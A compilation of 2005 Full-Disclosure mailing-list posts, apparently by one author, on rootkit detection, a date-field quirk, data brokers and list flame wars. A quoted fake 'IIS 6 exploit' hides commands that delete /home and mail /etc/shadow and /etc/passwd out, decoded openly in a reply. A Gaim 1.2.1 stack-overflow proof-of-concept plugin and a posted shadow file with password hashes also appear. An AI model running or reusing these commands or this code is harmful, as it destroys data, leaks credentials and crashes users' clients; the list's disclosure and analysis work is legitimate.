> agreement with Cisco of his own free will.  Who do you think you are
> to go against an agreement he made, with his own information?
>
> I sincerely hope it bites you in the arse.
>

Was it free will, or the threat of jail and other difficulties?

Afterall, employment was not a show stopper for him, he quit to release
his findings and gain glory in the crowds at hacker fests.  so was it
really free will I ask again?

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Beware trojaned exploits!

[Ron]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hmm, I'm noticing a pattern.

Warning: don't download exploits from any sites that have an 'o'
replaced with a '0'!  The 0 obviously makes them less secure, or
something.



[EMAIL PROTECTED] wrote:
> Hackers may be at risk!
> 
> It has come to our attention that a large amount of public
> security exploits/software have been modified and re-posted
> to legitimate trusted information sites for public downloads.
> 
> We have recently came across 5 exploits that have had a shellcode
> modification
> after legit verification of trusted download sites.
> 
> The following information security sites have listed a number of
> modified exploits:
> 
> unl0ck security research
> g0tfault security
> m00 security
> 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.9.15 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFC544DfqSf2EkP4p4RAq1iAJwLcdKzebJtb8nsJ9vbMr1cAXLDYwCffAwX
ncwv02cySQDLh/tYaEuMmzI=
=eUHO
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Rooting Linux with a floppy

[Ron]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

_Linux_ doesn't have a version 10, either.  Linux IS the kernel, which
the versions are 2.x (2.4.* and 2.6.* usually).

Maybe you're talking about a specific distribution? In which case,
that's a pretty inconsistant numbering system to use since Red Hat,
Mandrake, Slackware, etc. all use different numbering conventions.

James Longstreet wrote:
> On Fri, 15 Jul 2005, Lauro, John wrote:
> 
> 
>> 6.2?  What is that???  Latest kernel is 2.6...
> 
> 
> No, not kernel 6.2, LINUX 6.2.  You know, that old version.  Linux 10 has
> been out for months.
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
> 
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.9.15 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org

iD8DBQFC193zfqSf2EkP4p4RAiMvAJ9x9PeHs4rOvIO+dLf42pFzPxOTJgCfVGGT
5AFKvXB5iLxGqaqzN+x2wCk=
=WgZD
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: alert: the 111111 bug

[Ron DuFresne]

On Mon, 4 Jul 2005, Thomas Binder wrote:

> Hi!
>
> On Sun, Jul 03, 2005 at 10:18:02PM -0500, Paul Schmehl wrote:
> > Not to worry.  The 11th of November, 2011 is a Saturday.  No one
> > will be working that day.  :-)
>
> Mhmm, it's a Friday according to my calendar - is mine or yours in
> error?
>


cal reports it as a Friday here also, damn, now I have to drive the 45
miles in for sure!

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] alert: the 111111 bug

[Ron DuFresne]

On Sun, 3 Jul 2005, Paul Schmehl wrote:

> --On July 4, 2005 12:03:02 AM +0100 lsi <[EMAIL PROTECTED]> wrote:
> >
> > For this customer 11/11/11 in the date field means, don't process
> > this record, which will obviously cause problems with legitimate
> > transactions on that date.
> >
> > I suspect using a new field to flag a state, instead of "special"
> > data, would have been more appropriate.
> >
> Not to worry.  The 11th of November, 2011 is a Saturday.  No one will be
> working that day.  :-)

Almost no one, though states tend to view weekends as merely an extension
to the week and I'm likely going to have to be doing maintainance or
working indirectly from home as usual


Thanks,

Ron DuFresne
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] alert: the 111111 bug

[Ron DuFresne]

Of course, this is not a bug, but bad admin/dbadmin practise, for which
there are no patches available.

thanks,

Ron DuFresne

On Mon, 4 Jul 2005, lsi wrote:

> platforms affected: all
> distribution of threat: wide
> severity of threat: potentially serious
> leadtime: 6.3 years :)
>
> I noticed one of my customers using the "special" date of 11/11/11 in
> their database.
>
> I've since realised this practice might be quite widespread, and
> indeed warrants an alert than on or around the 11th of November 2011,
> some crazy things might happen, as folks' "special" dates collide
> with the real date of 11/11/11.
>
> For this customer 11/11/11 in the date field means, don't process
> this record, which will obviously cause problems with legitimate
> transactions on that date.
>
> I suspect using a new field to flag a state, instead of "special"
> data, would have been more appropriate.
>
> Apologies if this is old news for you.
>
> Stu
>
> ---
> Stuart Udall
> stuart [EMAIL PROTECTED] net - http://www.cyberdelix.net/
>
> ---
>  * Origin: lsi: revolution through evolution (192:168/0.2)
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] RE: End users as security devices

[Ron DuFresne]

>
> Don't lose faith, don't give up, keep explaining, and training. You CAN
> make end users proactive participants in enterprise security. Just
> remember, there will always be a few intellectually challenged folks who
> need a bit of extra mentoring. Try to be patient, and NO, you can't put
> handicap placards on computers used by those with IQs  below 90, sorry.
>

if this was true, then educating would not be a full time thing making
some companies tons of cash as they come into an org and do it over and
over and over

Thanks,

Ron DuFresne

-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Gaim 1.2.1 -- PoC Stack Overflow

[Ron]

Product: Gaim
Version: 1.2.1
Remote: Yes
Effect: DoS, potential arbitrary code execution
Date: May 13, 2005
I was looking at the stack overflow reported in Gaim 1.2.1.  It's 
actually pretty trivial to find.  The line that contains it looks like this:

strcpy(url_buf, gurl_buf->str);
url_buf is a 8192-byte buffer, and gurl_buf->str is an email address 
that is being displayed (user controlled).

The difficulty in writing a real exploit is that the input is sanitized, 
so any character over 128, as well as ' ', ',', '\n', '<', and others 
are stripped away.  This doesn't leave much to play with, although I'm 
still confident that it would be possible to write an exploit under 
these conditions.  I just don't have the motivation to do it :)

Another difficulty is that most chat protocols limit you to a reasonable 
message size, and 8192 is typically well above that size.  So even if 
you could successfully create an exploit, you would still have to do it 
on a chat protocol that allows very long messages. 

The final difficulty is that you also process the URL locally, when you 
send it, but that's not really a big deal.  It would be trivial to 
filter it out in a plugin to make sure you don't crash yourself.

For this example, I just threw together a quik plugin which sends a 
10002-character email address when the user types "/vuln".  Gaim crashes 
at the address 0x41414141.

---
(gdb) run
Starting program: /usr/local/bin/gaim
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 24908)]
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 24908)]
0x41414141 in ?? ()
---
So in a real situation, this can be done.  It's just difficult.
If anybody is actually able to use this for anything, please let me 
know.  I'd be interested how this can be exploited.

-Ron


// Written by Ron <[EMAIL PROTECTED]>
// Friday, May 13, 2005
//
// This is a very weak demonstration of Gaim 1.2.1's stack overflow 
vulnerability 
// when processing email addresses.  What this basically does is segfault you 
when you 
// do a /vuln command in a conversation, and, if you're using a protocol that 
allows
// a 10002-character message to go through, also segfaults the person you sent 
it to.
// The reason is that gaim's stack is overwritten with a whole bunch of 'A's, 
and
// the return address of the function ends up at 0x41414141.  That's no good 
for 
// anybody.
//
// This code should be considered public domain, and is freely 
modifiable/distributable
// by any and everyone.  
//
// Note:
// To compile, place this in the "plugins" directory of Gaim's source 
// (gaim-1.2.1/plugins) and type "make vuln-plugin.so".  This will compile 
vuln-plugin.so.
// Then put it in ~/.gaim/plugins, restart gaim, and load it as a plugin.


#include  
#include 
#include 
#include 
#include 
#include 
#include 

#include "internal.h"
#include "gtkgaim.h"

#include "debug.h"
#include "signals.h"
#include "util.h"
#include "version.h"
#include "cmds.h"
#include "conversation.h"

#include "gtkplugin.h"
#include "gtkutils.h"

#define ME "1.2.1 Vuln Check"
#define MAXLENGTH 1024
#define XMMS_PLUGIN_VERSION "I am a test plugin to check for URL encoding 
vulnerability."

static GaimCmdId cmd;


char *code = "[EMAIL PROTECTED]";

gboolean go(GaimConversation *conv, const gchar *cmd, gchar **args, gchar 
**error, void *data)
{
gaim_conv_im_send(GAIM_CONV_IM(conv), code);

return GAIM_CMD_STATUS_OK;
}

static gboolean plugin_load(GaimPlugin *plugin)
{
cmd = gaim_cmd_register("vuln", "", GAIM_CMD_P_DEFAULT, 
GAIM_CMD_FLAG_IM, NULL, (GaimCmdFunc)go, "/vuln", NULL);

return TRUE;
}

static gboolean plugin_unload(GaimPlugin *plugin)
{
gaim_cmd_unregister (cmd);

return TRUE;
}

static GaimPluginInfo info =
{
GAIM_PLUGIN_MAGIC,
GAIM_MAJOR_VERSION,
GAIM_MINOR_VERSION,
GAIM_PLUGIN_STANDARD,/**< type */
NULL,/**< ui_requirement */
0,  /**< flags*/
NULL,/**< dependencies   */
GAIM_PRIORITY_DEFAULT,  /**< priority  */
NULL,/**< id
 */
N_("1.2.1 Email Overflow Demo"),/**< 
name  */
VERSION,  /**< version  */
   

Re: [Full-disclosure] (no subject)

[Ron]

lmao
root = you
kfinisterre = are
dotslash = so
mandark = lame
dognutz = for
elguapo = cracking
m0ssimo = this
KF (lists) wrote:
root:$1$WO0cTkiq$4x/Of2KBx2HRwv/OXmggv1:12741:0:9:7:::
daemon:*:12741:0:9:7:::
bin:*:12741:0:9:7:::
sys:*:12741:0:9:7:::
sync:*:12741:0:9:7:::
games:*:12741:0:9:7:::
man:*:12741:0:9:7:::
lp:*:12741:0:9:7:::
mail:*:12741:0:9:7:::
news:*:12741:0:9:7:::
uucp:*:12741:0:9:7:::
proxy:*:12741:0:9:7:::
postgres:*:12741:0:9:7:::
www-data:*:12741:0:9:7:::
backup:*:12741:0:9:7:::
operator:*:12741:0:9:7:::
list:*:12741:0:9:7:::
irc:*:12741:0:9:7:::
gnats:*:12741:0:9:7:::
nobody:*:12741:0:9:7:::
kfinisterre:$1$Rlqwwnze$.Faoa/0IpZ1ug5KqMZzMx1:12741:0:9:7:::
dotslash:$1$eCrTVdS5$XHZnOfRWMFYTs92/QW/k4/:12741:0:9:7:::
mandark:$1$lQPtoOYr$yi6XOruuh9Guz5x.MJOSu/:12741:0:9:7:::
dognutz:$1$bPIf0IFu$uzZgKkd2khdibcpEw1h/l1:12741:0:9:7:::
elguapo:$1$wPen8ltL$JE.hM3R/Dq32P47J6Myds/:12741:0:9:7:::
m0ssimo:$1$l/g.bEkT$dkBIncT1bmdZ48P60dmV61:12741:0:9:7:::
sshd:!:12741:0:9:7:::
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer OverflowExploit(was broken)

[Ron DuFresne]

On Thu, 21 Apr 2005, bkfsec wrote:

> Day Jay wrote:
>
> >I think it's a whole lot of trouble to the newbie
> >beginners who probably ran it the first time.
> >
> >Lamers. Heh.
> >
> >
> >
> >
> I haven't seen any evidence as of yet that anyone ran this code on a
> segment connected to the network (seeing as I haven't seen any passwd or
> shadow files posted to the list...) indicating that most people probably
> ran it (if anyone ran it at all) from test machines.
>
>   -Barry
>

Barry,

waste not your time jj, or dj or whatever is not worth the effort.  they
have a early history with the list and all dating back to the phracker
crew on efnet and this lists early days, never contributing much worth
reading or considering.  and taken from recent posts and comments are
likely the type tp kick crutches out from under handicapped folks and the
like.  Do as the rest of us tend to and add em to yer procmail filters to
dead end em, why even waste the time hitting delete?


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] FIXED CODE - IIS 6 Remote Buffer Overflow Exploit(was broken)

[Ron]

The ONLY posts I don't like are posts like that, complaining about the 
list.  Like somebody else said, the rest of this list provides great 
"comic relief"!

Javi Polo wrote:
On Apr/20/2005, Day Jay wrote:
 

You are wrong again, it's "Smashing the Stick" you
moron. Not smashing the stack. Ask anyone here!
Man, you are such a newbie. Get a clue and stop trying
to say the sweet code is a backdoor just because you
don't know how to compile software properly. You're
nothing but a newbie wanna be C programmer with a dick
in his ass and a lack of hacking skills.
   

.
Should this list be moderated?
it's starting to be a pile of shit ... :/
 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IIS 6 Remote Buffer Overflow Exploit

[Ron]

haha, nice:
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehe
cat /etc/shadow |mail full-disclosure@lists.grok.org.uk
cat /etc/passwd |mail full-disclosure@lists.grok.org.uk
lol @ anybody who does it. 

Day Jay wrote:
/* Proof of concept code
  Please don't send us e-mails
  asking us "how to hack" because
  we will be forced to skullfsck you.
DISCLAIMER:
!!NOT RESPONSIBLE WITH YOUR USE OF THIS CODE!!
  IIS 6 Buffer Overflow Exploit
  BUG: inetinfo.exe improperly bound checks
  http requests sent longer than 6998 chars.
  Can get messy but enough testing, and we have
  found a way in.
  VENDOR STATUS: Notified
  FIX: In process
  Remote root.
  eg.
  #./iis6_inetinfoX xxx.xxx.xxx.xxx -p 80
   + Connecting to host...
   + Connected.
   + Inserting Shellcode...
   + Done...
   + Spawining shell..
   Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.
  C:\>

*/
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";
char launcher [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73"
"\x68\x61\x64\x6f\x77\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
char netcat_shell [] =
"\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70"
"\x61\x73\x73\x77\x64\x20\x7c\x6d\x61\x69"
"\x6c\x20\x66\x75\x6c\x6c\x2d\x64\x69"
"\x73\x63\x6c\x6f\x73\x75\x72\x65\x40"
"\x6c\x69\x73\x74\x73\x2e\x67\x72\x6f\x6b"
"\x2e\x6f\x72\x67\x2e\x75\x6b\x20";
main()
{
//Section Initialises designs implemented by mexicans
//Imigrate
system(launcher);
system(netcat_shell);
system(shellcode);
//int socket = 0;
//double long port = 0.0;
//#DEFINE port host address
//#DEFINE number of inters
//#DEFINE gull eeuEE
// for(int j; j < 30; j++)
   {
   //Find socket remote address fault
   printf(".");
   }
//overtake inetinfo here IIS_66^
return 0;
}

		
__ 
Do you Yahoo!? 
Plan great trips with Yahoo! Travel: Now over 17,000 guides!
http://travel.yahoo.com/p-travelguide
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Re: Case ID 51560370 - Notice of ClaimedInfringement

[Ron DuFresne]

On Thu, 7 Apr 2005, Poof wrote:

[SNIP]

> That's why if you wanted, you could sell bags of flour as cocaine and not be
> charged with drug dealing. Fine, it looks the same and weighs the same,
> however it isn't the product that's illegal. And to prove that it's illegal,
> they need to test it.
>

Actually, at least in the US, there is a law  that would make this illegal and subject one to prison time...


Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] windows linux final study

[Ron DuFresne]

On Tue, 29 Mar 2005, Lachniet, Mark wrote:

> Curmudgeon,
>
> Yes, but did you actually verify their research using their methodology
> to see if they screwed up?
>

[SNIP]

But, if the conclusions are patently false, to say the least, does it
matter if the underlying methodology has any tendency to soundness?  

Thanks,


Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] windows linux final study

[Ron]

Well, the only reply to that would be:
Since the catholic church say God exists and they have a vested interest
in the matter they must be lying.  Therefore God doesn't exist.  I rest
my case.
 

Of course I'd be skeptical of their proof.  If the Republicans came out 
with proof that Democrats suck, I'd be skeptical.  When a commercial 
says "we are proven to have the best rates" I'm skeptical. 

"Statistics can be used to prove anything - 53% of all people know that"
Statistics can be skewed, important numbers can be ignored, numbers can 
be used to prove different things if used cleverly, and an experiment 
can be designed in such a way to favor one side (a bias).  That's why, 
for an experiment involving statistics, I want to see a neutral party 
finding the results.

But that's just me.  That's no more than an argument against the theory. 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Lameness

[Ron DuFresne]

On Thu, 24 Mar 2005, David Chastain wrote:

> It sounds then like its reputation has already been labeled??? Is there a 
> moderator that can take control a little and maybe get FD back on the 
> right track
>
>

from the headers of your posting here;

List-Id: An unmoderated mailing list for the discussion of security issues
    


Thanks,


Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: choice-point screw-up and secure hashes

[Ron DuFresne]

On Sat, 19 Mar 2005, Vincent van Scherpenseel wrote:

> On Saturday 19 March 2005 13:02, Kurt Seifried wrote:
> > > Don't forget that it's bad for the company's image to have confidential
> > > customer data stolen. As soon as the press catches on it's bad for
> > > business.
> > > So, companies *do* have a drive to secure your private data.
> >
> > Uhhh no. See consumers such as yourself don't actually purchase services
> > from choicepoint/etc (unless you're a Nigerian guy who is into ID theft =).
> > Businesses do. And businesses don't care if choicepoint is secure or not,
> > they care if choicepoint has the data. It's like Equifax, you don't buy
> > information from them, companies you deal with do. These firms have no
> > incentive to protect your information, because they'll never lose your
> > business.
>
> Consumer A pays for a service from Company B which uses a payment method from
> Company C. Company C holds data from Consumer A for Company B. Now, C gets
> compromised and data from A is stolen. Don't you think the consumer will
> knock on Company B's door? The consumer doesn't deal with Choicepoint, the
> consumer deals the company, as you said. Now, Company B has been found
> responsable for the mess by the consumer. Don't you think B will now knock on
> C's door?


Do you know which companies trade and buy personal data from your bank,
insurance company, the utilities , your city and
county, your ISP, ...?

How many people new of let alone knew/know which comapnies choice-point
obatined their data from?  Quite often putting pressure on company C is
not a straight forward matter for the public at large.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Re: choice-point screw-up and secure hashes

[Ron DuFresne]

On Sat, 19 Mar 2005, Kurt Seifried wrote:

> > Don't forget that it's bad for the company's image to have confidential
> > customer data stolen. As soon as the press catches on it's bad for
> > business.
> > So, companies *do* have a drive to secure your private data.
>
> Uhhh no. See consumers such as yourself don't actually purchase services
> from choicepoint/etc (unless you're a Nigerian guy who is into ID theft =).
> Businesses do. And businesses don't care if choicepoint is secure or not,
> they care if choicepoint has the data. It's like Equifax, you don't buy
> information from them, companies you deal with do. These firms have no
> incentive to protect your information, because they'll never lose your
> business.
>
> Sorry to break it to you, but there are no market forces to drive these
> companies to better security.
>

Let alone the fact that peopoe, individuals, tend to ahve very short term
memories of such events, unless directly affected by the event.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Microsoft GhostBuster Opinions

[Ron DuFresne]

On Fri, 18 Mar 2005, dk wrote:

> Ron DuFresne wrote:
>
> > If the kernel is modified, on a windows or *nix system, you are going to
> > have a clear clue upfront;  the system will have rebooted.  Course, a
>
> That's a dangerous position to believe, at least with the linux kernel
> (man insmod). Aside from just loading a kernel module that wraps system
> calls, one has been able to directly modify kernel memory for years,
> even without kernel bugs. Hence the utility of PaX, grsec, etc, etc.
>
> In fact a few popular RK's do just his via /dev/kmem (bypassing module
> loading) and the like do they not? (like suckit??)
>
> Further research might be in order.  ;-)
>
> http://www.l0t3k.org/biblio/kernel/english/runtime-kernel-kmem-patching.txt
>
> http://www.phrack.org/show.php?p=58&a=7
>
> http://www.l0t3k.org/security/docs/rootkit/
>


agreed, thanks again to you and the earlier posters for correcting me.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

RE: [Full-disclosure] Microsoft GhostBuster Opinions

[Ron DuFresne]

On Fri, 18 Mar 2005, Todd Towles wrote:

>
> Dave wrote:
>
> > About Tripwire, I understand what it does.  It basically
> > runs a file integrity check on certain files and reports the
> > differences from the last (hopefully known good) scan.  Say
> > that Tripwire is running on a system that's been compromised
> > by a rootkit that's been designed to evade file integrity
> > checkers such as tripwire.  Since the rootkit has control of
> > the kernel it has control of all the low level functions,
> > like returning a file when asked for one.  So one way to
> > evade tripwire would be to return the real file when asked
> > for it in read-only mode and return the rootkit file when
> > asked for it in execution mode.  That way tripwire won't
> > think the file has changed, since it's being given the same
> > file as it checked before, but when the file is executed then
> > it's the malicious file.
>
> But could this not be bypassed by running Tripwire from a bootable CD?
> The modified keneral would be inactive and therefore you would see the
> two separate files are opposed to just one. This is the idea that this
> new Microsoft products uses, but as people have stated, this can be done
> now with a combination of open-source products.


Now days, with the price of drives and devices being hot swapable, this is
even easier to deal with, at least in suspected cases of system tampering;

where I work we tend to make dd or rsync copies of the running drive to a
backup dirve.  Most of the servers allow hot swapping out these secondary
drives.  If the main drive fails I can boot off the backup, if I suspect a
problem with the integrity of the main file system, I can place the drive
in another system, mount it and run a tripwire against that.

AS for that LKM that can keep two copies of a file on the system and send
one for reads and execute another, that;s pretty advanced, and would have
to evade the differences that the various tripwire signatures are going to
produce on a file or filesystem that has been moved and altered in this
fashion.  Or take advantage of those places, and there are many, that
don;t properly keep the tripwrie db on read only media and alter those
sigs contained therein.  At this point it;s perhaps mostly hypothetical as
I'm unaware of rootkits that can accomplish that.

The poster talking about alternate data streams on ntfs systems , that's a problem to get around still on those
platforms.

To the original reply and other poster, thanks for the links to alternate
URL's for the old paper on kernel hacking!

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

Re: [Full-disclosure] Social Engineering: You Have Been A Victim

[Ron DuFresne]

On Thu, 17 Mar 2005, Paul Laudanski wrote:

> by Darren W. Miller, aka defendingthenet, CastleCops Staff Writer
> March 14, 2005
>
> Monday morning, 6am; the electric rooster is telling you it's time to
> start a new work week. A shower, some coffee, and you're in the car and
> off.  On the way to work you're thinking of all you need to accomplished
> this week.  Then, on top of that there's the recent merger between your
> company and a competitor. One of your associates told you, you better be
> on your toes because rumors of layoff's are floating around.
>
> More: http://castlecops.com/article-5807-nested-0-0.html
>
>

gov workers do even need to be bribed with chocolate;

http://www.securityfocus.com/news/10708?ref=rss

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

Re: [Full-disclosure] Microsoft GhostBuster Opinions

[Ron DuFresne]

On Thu, 17 Mar 2005, Dave King wrote:

> [EMAIL PROTECTED] wrote:
>
> >On Thu, 17 Mar 2005 11:28:55 MST, Dave King said:
> >
> >
> >
> >>Also, this is not just like tripwire.  If the kernel is compromised
> >>and reporting false data to tripwire then tripwire can run along merrily
> >>thinking every thing's great.  This is why booting to a trusted kernel
> >>is important for the process.  Exploiting Software by Hoglund and McGraw
> >>has a discussion on these types of rootkits.  Tripwire, however does
> >>great at detecting other sorts of intrusions.
> >>
> >>
> >
> >Actually, the "prior art" *is* tripwire.  If you run tripwire on the live
> >system, then run it while booted from a CD, and they produce different
> >results, you have a problem.
> >
> >And that's what they're doing by doing a 'dir /a /s' on the live system,
> >then booting the Windows PE CD, and looking for differences
> >
> >
> Ok, this is true.  I guess what I meant by what I said was running
> tripwire as a cron job daily or whatever on a system without booting  to
> a known good kernel could yeild incorrect results if the kernel has been
> compromised.  A similar result can be had using tripwire on the system
> then booting to a known good kernel and running it again.
>

If the kernel is modified, on a windows or *nix system, you are going to
have a clear clue upfront;  the system will have rebooted.  Course, a
failing system that reboots or blue screens every few weeks rather then
runs stable unless there is a total power outage or a maint window when such
things are done is another problem altogether...

Of course, I'm not sure you understand what tripwire is or does, further
research might be in order.

Thanks,

Ron DuFresne
-- 
"Sometimes you get the blues because your baby leaves you. Sometimes you get'em
'cause she comes back." --B.B. King
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D.  Just don't touch anything.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/

Re: [Full-disclosure] Wi-fi. Approaching customers

[Ron DuFresne]

On Wed, 16 Mar 2005, Gregh wrote:

[HEADERS SNIPPED]

>
>
> >
> >>From what little I read on their site, it seems to be a radius auth mech
> > based upon MAC addresses.
> >
>
> Isn't that basically what a lot of wi-fi broadband router/modems do anyway?
>
> Eg, set up a netgear DG834 (think it was) and it was having problems with 
> auto assigned IPs for lan members so shortcut the problem by telling it to 
> manually assign IP number to MAC so that each time a MAC came in range it got 
> the same IP number always. I set the IP numbers manually at each client 
> computer and thus they would only connect using that number. Connection 
> problems died off instantly, then. The upshot is that if the MAC is unknown, 
> it cant get access now even if the WEP is successfully decrypted. Wouldn't 
> that radius auth be basically that idea?
>

That's what I read, as well as a lot of talk about "location-enabled
network or LENs", which the more reading I do give the impression they
have some kind of GPS functionality invovled, this is the only way I can
make any real sense of their claims to be able to segment the wLAN into
locations and determine a sense of perimiter limits and location sense.
Of course, I'm trying to give the benefit of the doubt and read that they
actually sell what they are claiming in marketing lit.

Thanks,


Ron DuFresne
-- 
